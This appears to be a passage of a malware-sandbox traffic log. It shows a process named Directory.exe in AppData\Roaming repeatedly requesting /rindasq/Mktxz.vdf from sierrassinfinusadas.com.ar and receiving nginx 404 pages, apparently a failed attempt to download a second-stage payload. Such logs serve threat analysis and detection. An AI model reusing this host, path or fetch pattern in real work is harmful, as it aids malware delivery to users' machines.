                                                        2024-11-21 11:55:21 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.649757167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:22 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:23 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:23 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:23 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.649763167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:25 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:25 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:25 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.649769167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:27 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:27 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:27 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:27 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.649774167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:29 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:30 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:29 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.649782167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:31 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:32 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:32 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:32 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.649788167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:33 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:34 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:34 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:34 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.649794167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:36 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:36 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:36 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:36 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.649801167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:38 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:38 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:38 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:38 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.649806167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:40 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:41 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:41 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.649813167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:43 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:43 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:43 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:43 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.649821167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:45 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:46 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:45 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:46 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.649827167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:47 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:48 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:48 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:48 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.649834167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:50 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:50 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:50 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:55:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.649840167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:55:52 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:55:53 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:55:52 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
